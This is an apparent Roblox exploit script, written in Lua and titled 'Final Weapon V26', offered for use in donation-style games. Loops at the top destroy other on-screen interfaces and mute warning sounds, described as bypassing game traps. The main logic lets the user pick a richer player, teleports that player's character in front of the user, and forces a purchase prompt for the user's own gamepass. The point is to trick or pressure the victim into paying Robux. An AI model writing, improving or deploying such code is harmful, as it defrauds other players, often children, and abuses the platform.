-- [[ ðŸ‘‘ GHALOULIX9: THE FINAL WEAPON V26 ðŸ‘‘ ]] --
-- ðŸ› ï¸ 100% RAW LUA | NO LINKS | NO RAYFIELD | NO LOADSTRING
-- â˜£ï¸ WARNING: THIS SCRIPT KILLS ALL OTHER GUIS TO BYPASS GAME TRAPS

repeat task.wait() until game:IsLoaded()

local LP = game.Players.LocalPlayer
local CoreGui = game:GetService("CoreGui")
local MarketService = game:GetService("MarketplaceService")
local UIS = game:GetService("UserInputService")

-- [[ â˜£ï¸ NUCLEAR LOOP PURGE (BYPASS ENGINE) ]] --
task.spawn(function()
    while task.wait(0.1) do
        for _, v in pairs(CoreGui:GetChildren()) do
            -- Destroys everything except Roblox's core and YOUR script
            if v:IsA("ScreenGui") and v.Name ~= "FINAL_WEAPON" and v.Name ~= "RobloxGui" and v.Name ~= "Chat" then
                v:Destroy()
            end
        end
        -- Mute all game-forced warning sounds
        for _, s in pairs(game:GetDescendants()) do
            if s:IsA("Sound") and (s.Name:lower():find("warn") or s.Name:lower():find("beep") or s.Name:lower():find("alert")) then
                s.Volume = 0
                s:Stop()
            end
        end
    end
end)

-- [[ ðŸŽ¨ FINAL WEAPON UI ]] --
local UI = Instance.new("ScreenGui", CoreGui); UI.Name = "FINAL_WEAPON"
local Main = Instance.new("Frame", UI)
Main.Size = UDim2.new(0, 480, 0, 380); Main.Position = UDim2.new(0.5, -240, 0.5, -190)
Main.BackgroundColor3 = Color3.fromRGB(10, 0, 0); Main.BackgroundTransparency = 0.2
Instance.new("UICorner", Main).CornerRadius = UDim.new(0, 15)
local Neon = Instance.new("UIStroke", Main); Neon.Thickness = 4; Neon.Color = Color3.fromRGB(255, 0, 0)

-- Header
local Title = Instance.new("TextLabel", Main)
Title.Size = UDim2.new(1, 0, 0, 50); Title.Text = "FINAL WEAPON V26"; Title.TextColor3 = Color3.new(1,1,1)
Title.Font = "GothamBlack"; Title.TextSize = 20; Title.BackgroundTransparency = 1

-- Wealth/Status (Glass Style)
local Status = Instance.new("TextLabel", Main)
Status.Size = UDim2.new(0.9, 0, 0, 60); Status.Position = UDim2.new(0.05, 0, 0.15, 0)
Status.BackgroundColor3 = Color3.fromRGB(0, 0, 0); Status.BackgroundTransparency = 0.6
Status.TextColor3 = Color3.new(1, 1, 1); Status.Font = "Code"; Status.TextSize = 14
Status.Text = ">> TRAPS BYPASSED. READY."; Status.TextWrapped = true; Instance.new("UICorner", Status)

-- Selection
local PList = Instance.new("ScrollingFrame", Main)
PList.Size = UDim2.new(0.44, 0, 0.45, 0); PList.Position = UDim2.new(0.05, 0, 0.35, 0)
PList.BackgroundTransparency = 1; PList.AutomaticCanvasSize = "Y"; PList.ScrollBarThickness = 0
Instance.new("UIListLayout", PList).Padding = UDim.new(0, 5)

local InputArea = Instance.new("Frame", Main)
InputArea.Size = UDim2.new(0.44, 0, 0.45, 0); InputArea.Position = UDim2.new(0.51, 0, 0.35, 0); InputArea.BackgroundTransparency = 1

local IDBox = Instance.new("TextBox", InputArea)
IDBox.Size = UDim2.new(1, 0, 0, 40); IDBox.PlaceholderText = "GAMEPASS ID"; IDBox.Text = ""
IDBox.BackgroundColor3 = Color3.fromRGB(40, 0, 0); IDBox.TextColor3 = Color3.new(1,1,1); Instance.new("UICorner", IDBox)

local VerifyBtn = Instance.new("TextButton", InputArea)
VerifyBtn.Size = UDim2.new(1, 0, 0, 40); VerifyBtn.Position = UDim2.new(0, 0, 0.35, 0)
VerifyBtn.Text = "VERIFY & SAVE"; VerifyBtn.BackgroundColor3 = Color3.fromRGB(180, 0, 0)
VerifyBtn.TextColor3 = Color3.new(1,1,1); VerifyBtn.Font = "GothamBold"; Instance.new("UICorner", VerifyBtn)

-- Action
local Action = Instance.new("TextButton", Main)
Action.Size = UDim2.new(0.9, 0, 0, 55); Action.Position = UDim2.new(0.05, 0, 0.82, 0)
Action.BackgroundColor3 = Color3.fromRGB(40, 40, 40); Action.Text = "VERIFY TO START"; Action.TextColor3 = Color3.new(1,1,1)
Action.Font = "GothamBlack"; Action.TextSize = 20; Instance.new("UICorner", Action)

-- [[ âš™ï¸ SYSTEM LOGIC ]] --
local TargetUser = nil
local CurrentPass = nil
local SAVE_ID = "FinalWeaponID.txt"

-- Player Loader
local function Load()
    for _, v in pairs(PList:GetChildren()) do if v:IsA("TextButton") then v:Destroy() end end
    for _, p in pairs(game.Players:GetPlayers()) do
        if p ~= LP then
            local b = Instance.new("TextButton", PList); b.Size = UDim2.new(1, 0, 0, 35); b.BackgroundColor3 = Color3.fromRGB(20, 20, 20); b.BackgroundTransparency = 0.5
            b.Text = p.DisplayName; b.TextColor3 = Color3.new(1,1,1); b.Font = "GothamBold"; Instance.new("UICorner", b)
            b.MouseButton1Click:Connect(function() 
                TargetUser = p
                local r = (p:FindFirstChild("leaderstats") and p.leaderstats:FindFirstChild("Raised") and p.leaderstats.Raised.Value or 0)
                Status.Text = ">> TARGET: " .. p.Name .. " | WEALTH: " .. r .. " R$"
            end)
        end
    end
end

-- Verification
VerifyBtn.MouseButton1Click:Connect(function()
    local id = tonumber(IDBox.Text)
    if not id then Status.Text = ">> INVALID ID"; return end
    local ok, info = pcall(function() return MarketService:GetProductInfo(id, Enum.InfoType.GamePass) end)
    if ok and info then
        if info.Creator.CreatorTargetId == LP.UserId and info.IsPubliclySellable then
            CurrentPass = id
            if writefile then writefile(SAVE_ID, tostring(id)) end
            Status.TextColor3 = Color3.new(0, 1, 0); Status.Text = ">> SUCCESS: " .. info.Name
            Action.BackgroundColor3 = Color3.fromRGB(200, 0, 0); Action.Text = "DONATE / CONFIRM ðŸ”œ"
        else
            Status.TextColor3 = Color3.new(1, 0, 0); Status.Text = ">> NOT YOURS OR NOT ACTIVE!"
        end
    else
        Status.Text = ">> ID ERROR"; Status.TextColor3 = Color3.new(1, 0, 0)
    end
end)

-- Execution
Action.MouseButton1Click:Connect(function()
    if not TargetUser or not CurrentPass then return end
    local info = MarketService:GetProductInfo(CurrentPass, Enum.InfoType.GamePass)
    local wealth = (TargetUser:FindFirstChild("leaderstats") and TargetUser.leaderstats:FindFirstChild("Raised") and TargetUser.leaderstats.Raised.Value or 0)
    
    if wealth >= (info.PriceInRobux or 0) then
        local hrp = TargetUser.Character and TargetUser.Character:FindFirstChild("HumanoidRootPart")
        if hrp then
            local oldPos = hrp.CFrame
            hrp.CFrame = LP.Character.HumanoidRootPart.CFrame * CFrame.new(0, 0, -5)
            MarketService:PromptGamePassPurchase(TargetUser, CurrentPass)
            local fin; fin = MarketService.PromptGamePassPurchaseFinished:Connect(function(plr, id, state)
                if plr == TargetUser and id == CurrentPass then
                    task.wait(1.5); hrp.CFrame = oldPos; fin:Disconnect()
                end
            end)
        end
    else
        Status.TextColor3 = Color3.new(1, 0, 0); Status.Text = ">> PLAYER HAS NOT ENOUGH ROBUX"
    end
end)

-- Initialize
if isfile and isfile(SAVE_ID) then IDBox.Text = readfile(SAVE_ID) end
Load()

-- Dragging
local drag, dStart, sPos
Main.InputBegan:Connect(function(i) if i.UserInputType == Enum.UserInputType.MouseButton1 then drag = true dStart = i.Position sPos = Main.Position end end)
Main.InputEnded:Connect(function(i) if i.UserInputType == Enum.UserInputType.MouseButton1 then drag = false end end)
UIS.InputChanged:Connect(function(i) if i.UserInputType == Enum.UserInputType.MouseMovement and drag then local d = i.Position - dStart Main.Position = UDim2.new(sPos.X.Scale, sPos.X.Offset + d.X, sPos.Y.Scale, sPos.Y.Offset + d.Y) end end)
